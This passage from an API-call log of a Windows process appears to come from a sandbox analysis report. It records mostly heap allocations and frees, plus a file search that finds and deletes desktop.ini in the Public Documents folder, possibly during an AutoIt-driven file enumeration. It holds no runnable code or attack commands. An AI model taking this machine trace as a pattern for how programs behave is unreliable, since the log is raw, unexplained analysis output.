hHeap=0x970000) returned 1 [0269.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0269.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0269.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0269.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0269.103] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0269.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0269.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0269.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0269.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0269.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0269.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0269.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0269.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0269.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e58910 [0269.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0269.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0269.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e54858 [0269.104] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x25 [0269.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.104] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 0x26 [0269.104] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87250 [0269.104] DeleteFileW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 1 [0269.106] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0269.106] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0269.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0269.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0269.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0269.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0269.106] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0269.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0269.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0269.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0269.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0269.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0269.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0269.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e58910 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0269.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e54858 [0269.107] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x25 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.107] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 0xffffffff [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0269.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0269.107] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0269.108] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0269.108] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0269.108] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.108] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0269.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0269.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e28 [0269.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0269.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0269.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0269.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e68 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0269.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0269.110] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0269.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0269.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0269.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0269.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0269.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0269.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 